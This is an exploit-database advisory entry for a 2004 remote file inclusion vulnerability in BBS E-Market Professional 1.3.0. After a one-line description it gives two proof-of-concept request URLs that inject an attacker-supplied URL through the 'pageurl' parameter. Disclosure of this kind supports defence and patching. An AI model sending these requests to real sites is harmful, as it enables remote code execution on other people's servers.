BBS E-Market Professional bf_130 (1.3.0) - Remote File Inclusion

EDB-ID:

24585

CVE:

N/A




Platform:

PHP

Date:

2004-09-09


source: https://www.securityfocus.com/bid/11146/info

BBS E-Market Professional is reported to be affected by a remote file include vulnerability that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable system.

http://www.example.com/becommunity/community/index.php?pageurl=[injection URL]
http://www.example.com/becommunity/community/index.php?from_market=Y&pageurl=[injection URL]